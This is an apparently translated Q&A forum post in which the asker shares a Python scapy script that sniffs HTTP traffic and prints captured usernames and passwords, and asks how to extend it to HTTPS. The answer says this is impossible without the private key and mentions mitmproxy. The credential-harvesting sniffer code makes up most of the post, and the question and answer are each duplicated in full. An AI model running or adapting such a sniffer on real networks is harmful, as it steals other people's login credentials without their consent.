如何在此处添加对嗅探 HTTPS 数据包的支持?
How do I add support to sniff HTTPS packets here?
到目前为止,我已经能够使用它来过滤和查看 HTTP 请求和数据包。我如何添加额外的支持以类似地查看 HTTPS 数据包?
#!/usr/bin/env python
import scapy.all as scapy
from scapy.layers import http
def sniff(interface):
scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
def get_url(packet):
return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
def get_login_info(packet):
if packet.haslayer(scapy.Raw):
load = packet[scapy.Raw].load
keywords = ['username', 'uname', 'user', 'id', 'key', 'email', 'email-id', 'login', 'password', 'pass', "passwd"]
for keyword in keywords:
if keyword in load:
return load
def process_sniffed_packet(packet):
if packet.haslayer(http.HTTPRequest):
url = get_url(packet)
print("[+] HTTP Request >>> " + url)
login_info = get_login_info(packet)
if login_info:
print("\n\nEntered login credentials >>> " + login_info + "\n\n")
sniff("eth0")
简答:你不能。
您可能需要更多地研究 HTTPS。由于一切都是加密的,没有私钥你将看不到任何东西。
看
https://security.stackexchange.com/a/83039
如果您出于调试目的这样做,请查看 mitmproxy
,或者如果他们在您泄露的密钥上使用 RSA,请查看 this
。 (我怀疑你正在做这些)
到目前为止,我已经能够使用它来过滤和查看 HTTP 请求和数据包。我如何添加额外的支持以类似地查看 HTTPS 数据包?
#!/usr/bin/env python
import scapy.all as scapy
from scapy.layers import http
def sniff(interface):
scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
def get_url(packet):
return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
def get_login_info(packet):
if packet.haslayer(scapy.Raw):
load = packet[scapy.Raw].load
keywords = ['username', 'uname', 'user', 'id', 'key', 'email', 'email-id', 'login', 'password', 'pass', "passwd"]
for keyword in keywords:
if keyword in load:
return load
def process_sniffed_packet(packet):
if packet.haslayer(http.HTTPRequest):
url = get_url(packet)
print("[+] HTTP Request >>> " + url)
login_info = get_login_info(packet)
if login_info:
print("\n\nEntered login credentials >>> " + login_info + "\n\n")
sniff("eth0")
简答:你不能。
您可能需要更多地研究 HTTPS。由于一切都是加密的,没有私钥你将看不到任何东西。 看 https://security.stackexchange.com/a/83039
如果您出于调试目的这样做,请查看 mitmproxy
,或者如果他们在您泄露的密钥上使用 RSA,请查看 this
。 (我怀疑你正在做这些)